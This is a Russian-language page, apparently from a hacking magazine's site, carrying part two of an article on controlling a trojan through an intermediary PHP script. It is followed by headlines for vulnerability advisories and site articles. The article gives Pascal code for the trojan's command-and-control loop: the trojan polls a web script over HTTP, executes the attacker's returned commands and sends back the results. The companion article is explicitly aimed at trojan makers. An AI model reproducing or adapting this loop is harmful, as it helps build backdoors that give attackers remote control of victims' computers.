Софт

Управление трояном через скрипт-посредник №2

Код, реализующий это, выглядит так: // сначала запрос пустой request:=''; // цикл работы трояна while true do begin // отсылаем скрипту запрос if (SendStringViaHTTP('127.0.0.1', 'test1.ru', 80, '/index.php', request, answer)<>0) then begin // если отослать не удалось - ждём минуту и крутим следующую итерацию sleep(1000*SEC); continue; end; // если отослать удалось - проверим answer if (answer='') then begin // команд от хакера нет - очистим reques, // ждём минуту и крутим следующую итерацию request:=''; sleep(1000*SEC); continue; end; // если управление дошло сюда - в answer у нас команда хакера // выполняем команду request:=DoCommand(answer); end; Здесь answer и request у нас глобальные переменные типа AnsiString

Новости

Автор DeCSS снова с утилитой

Йон Лех Йохансен, автор программы DeCSS для обхода защиты от копирования DVD-дисков, выложил на своем веб-сайте "патч", поср…

Новости

HTTP Request Smuggling атака в web сервере Apache

Уязвимость позволяет удаленному пользователю произвести HTTP Request Smuggling атаку (атаку со скрытым HTTP запросом) на web…

Новости

Переполнение буфера в Microsoft Internet Explorer в библиотеке javaprxy.dll

Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.…

Новости

Удаленное выполнение PHP кода в XML-RPC for PHP

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость в XML-RPC fo…

Новости

Отказ в обслуживании в Blue Coat Systems ProxySG

Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании приложения. Уязвимость существует в реализации TCP…

Новости

PHP-инклюдинг в Pavsta Auto Site

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует п…

Новости

Выполнение произвольного PHP сценария в phpBB в коде highlighting

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует и…

Новости

Повышение привилегий в Adobe Acrobat/Adobe Reader Updater для MAC OS

Программа: Adobe Reader и Adobe Acrobat 7.0 и 7.1 для MAC OS

Материалы сайта

Stringer 2.1 beta

Большинство DOS-программ и некоторые программы под WINDOWS3.

Материалы сайта

7-Zip 4.23

Архиватор с интеграцией в оболочку Windows и поддержкой ZIP, RAR (включая RAR 3), CAB, 7z (собственный очень эффективный по степени сжатия формат), GZIP, BZIP2 и TAR архивов.

Новости

Google персонализируется

Google продолжает заманивать пользователей новыми услугами. Создав недавно поисковую систему для мобильных устройств, компан…

Новости

Выполнение произвольных приложений в Adobe Reader и Adobe Acrobat для MAC OS

Уязвимость позволяет удаленному пользователю выполнить произвольное приложение на целевой системе. Удаленный пользователь мо…

Новости

Повышение привилегий в загрузчике ld.so в Sun Solaris

Уязвимость позволяет локальному пользователю повысить свои привилегии на системе. Уязвимость существует из-за некорректной о…

Новости

Межсайтовый скриптинг в Community Server

Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других …

Новости

Множественные уязвимости в ASP Nuke

Программа: ASP Nuke 0.80 и более ранние версии Обнаруженные уязвимости позволяют удаленному пользователю произвести X…

Новости

Загрузка произвольных файлов в ASPPlayground.NET

Уязвимость позволяет удаленному пользователю загрузить произвольные файлы на сервер. Удаленный пользователь может послать сф…

Новости

Межсайтовый скриптинг в Mensajeitor

Новости

Межсайтовый скриптинг в PHP-Nuke

Новости

PHP-инклюдинг в JCDex Lite

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует в…

Новости

Отказ в обслуживании в IA eMailServer

Уязвимость позволяет удаленному авторизованному пользователю вызвать отказ в обслуживании приложения. Уязвимость существует …

Материалы сайта

Управление трояном через скрипт-посредник №1

Статья предназначена для более-менее опытных троянмейкеров, умеющих работать с TCP/IP через API и знакомых с HTTP-протоколом, в частности, с методом POST. Кроме того, необходимо разбираться в PHP на уровне работы с текстовыми файлами, строками и суперглобальными ассоциированными массивами (к коим относятся $_GET, $_POST и $_SERVER)

Новости

Выполнение произвольных команд в CSV_DB

Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе. Уязвимость существует из-за …

Новости

Раскрытие базы данных в Sukru Alatas`s Guestbook

Уязвимость позволяет удаленному пользователю получить доступ к базе данных приложения. Удаленный пользователь может с помощь…

Материалы сайта

Оконный доступ к БД

Хочу рассказать об одном интересном случае из собственной практики. Мой коллега, Web-программист, имеет довольно забавное хобби. Он коллекционирует видеофильмы, естественно и сайт с описанием этих самых фильмов сделал и каталогизирует все аккуратно и трепетно

Новости

Бумажный выпуск

Еженедельный дайджест

Партнерам

«Хакер» в соцсетях

Материалы для подписчиков